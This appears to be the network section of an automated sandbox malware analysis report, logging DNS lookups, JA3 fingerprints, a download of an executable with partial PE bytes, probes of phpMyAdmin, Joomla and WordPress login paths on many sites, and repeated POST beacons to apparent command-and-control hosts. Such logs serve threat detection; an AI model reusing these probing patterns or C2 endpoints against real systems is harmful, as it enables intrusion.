                      Source: unknownDNS traffic detected: query: ssh.llefigaro.fr replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ssh.er.stygg replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: relay.frametalent.it replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: pop3.eremina.net replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: noxnoir.dk replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mailgate.neugear.ca replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mailgate.eremina.net replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mail.topbingo-games.net replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: relay.mgnbizlaw.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ftp.aopcgaming.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ssh.elyashevich.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mail.joslindisplaysinc.co replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mail.mlk546gabr.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ftp.my-bingo-games.info replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: egmaik.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: kidj.net replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mailgate.finaleasing.it replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ftp.r2husers.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ssh.assiri.tk replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: princessmonty.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mail.kidj.net replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ssh.exmur.nia.nih.gov replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mailgate.moradfarag.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ftp.topbingo-games.net replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ftp.brevesdunsoir.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: elyashevich.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mail.elseti.net replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ftp.condorponteggi.it replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mail.estbest.ee replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: aopcgaming.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ftp.noxnoir.dk replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mail.llefigaro.fr replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mailgate.3marc.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mlk546gabr.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: imap.topbingo-games.net replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: imap.egmaik.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ftp.bingo.coza replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: smtp.ext.by replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ftp.yahoogabes.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mail.rabco.be replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ssh.rabco.be replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mail.elyashevich.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: smtp.3marc.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ftp.kidj.net replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ftp.elseti.net replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ftp.joslindisplaysinc.co replaycode: Name error (3)
                      Source: Joe Sandbox ViewJA3 fingerprint: 523e76adb7aac8f6a8b2bf1f35d85d1f
                      Source: Joe Sandbox ViewJA3 fingerprint: 83d60721ecc423892660e275acc4dffd
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.24.0Date: Sat, 02 Dec 2023 01:06:51 GMTContent-Type: application/octet-streamConnection: closeContent-Description: File TransferContent-Disposition: attachment; filename=ff365031.exeContent-Transfer-Encoding: binaryExpires: 0Cache-Control: must-revalidatePragma: publicData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b3 54 55 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 20 03 00 00 3a 3a 00 00 00 00 00 f3 95 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 3d 00 00 04 00 00 a9 e3 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 24 03 00 3c 00 00 00 00 f0 3b 00 98 39 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 49 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b0 1f 03 00 00 10 00 00 00 20 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 cc ba 38 00 00 30 03 00 00 4e 00 00 00 24 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 98 39 01 00 00 f0 3b 00 00 3a 01 00 00 72 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: 3marc.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: khodyari.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: conceptualintegration.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: conceptualintegration.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: mgnbizlaw.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: la-morada.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: 3marc.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: mcsmk8.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: evropskypravnik.czAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: evropskypravnik.czAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: ext.byAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: mgnbizlaw.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: eremina.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: conceptualintegration.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: bokod.huAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: bokod.huAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: pfprojekt.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: la-morada.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: ext.byAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: eremina.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: jumpnsplashwear.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: jumpnsplashwear.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: khodyari.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: mgnbizlaw.comAccept: */*Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=10.116.80.178; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: hoster.byAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: mgnbizlaw.comAccept: */*Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=10.116.88.101; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: hoster.byAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: mgnbizlaw.comAccept: */*Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=10.116.88.246; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: mgnbizlaw.comAccept: */*Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=10.116.80.178; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://mgnbizlaw.com/administrator/
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: mgnbizlaw.comAccept: */*Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=10.119.144.218; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: mgnbizlaw.comAccept: */*Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=10.116.88.101; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://mgnbizlaw.com/administrator/
                      Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: khodyari.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: mgnbizlaw.comAccept: */*Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=10.116.88.246; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: khodyari.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: mgnbizlaw.comAccept: */*Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=10.116.88.246; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: mgnbizlaw.comAccept: */*Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=10.116.88.101; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hanidnvetibgeinm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 129Host: sumagulituyo.org
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qsnvftnofreqd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 156Host: snukerukeutit.org
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://usgehfhqjpyqm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 119Host: lightseinsteniki.org
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ocinykkysevrsyc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 131Host: liuliuoumumy.org
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rqrupmmpekog.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 191Host: stualialuyastrelia.net
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tbdjkcycimo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 209Host: stualialuyastrelia.net
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://giaqbvjkhqgfut.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 303Host: stualialuyastrelia.net
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xwcyxjkovfsev.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 160Host: stualialuyastrelia.net
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dwrgqonrcuwu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 166Host: stualialuyastrelia.net
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oxcosiqkuaup.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 343Host: stualialuyastrelia.net
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://udixscnheyyj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: stualialuyastrelia.net
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lfctmntcxooqsn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 301Host: stualialuyastrelia.net
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://frrfkxkmvseygu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 253Host: stualialuyastrelia.net
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://busxtgydsymvwxb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 228Host: stualialuyastrelia.net
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gyqhdviuiysyix.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 128Host: stualialuyastrelia.net
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qyxinpdaqiaahua.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 218Host: stualialuyastrelia.net
                      Source: global trafficHTTP traffic detected: GET /atoz/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: atozrental.cc
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mptxglrfiyoip.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 342Host: stualialuyastrelia.net
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://stualialuyastrelia.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 501Host: stualialuyastrelia.net
                      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ffjptnnneye.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 218Host: humydrole.com
                      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://urjgtucwduxuidlt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 346Host: humydrole.com
                      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ermwjnjygpbjkmc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 310Host: humydrole.com
                      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://btqeylcvkobgtmo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 204Host: humydrole.com
                      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qheitjgdckv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 141Host: humydrole.com
                      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://icsxqcqpyvjgr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 312Host: humydrole.com
                      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xuyhyksjejdjybls.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 233Host: humydrole.com
                      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://irjafvvhjww.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 365Host: humydrole.com
                      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vlmdqkeuvramm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 365Host: humydrole.com
                      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pjodarlytknlhrm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 120Host: humydrole.com
                      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ajrsdhfsgvjbu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 136Host: humydrole.com
                      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xfvhvanuqwruj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 274Host: humydrole.com
                      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qetqebqqmxjeqsrj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 275Host: humydrole.com
                      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cdhkkixciru.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 328Host: humydrole.com
                      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ggktrccvsxqfs.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 199Host: humydrole.com
                      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qiachnslixnlv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 116Host: humydrole.com
                      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://asenutbisbhwhdug.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 128Host: humydrole.com
                      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wmutobwmvhvt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 174Host: humydrole.com
                      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fsodmukeefijdn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 366Host: humydrole.com
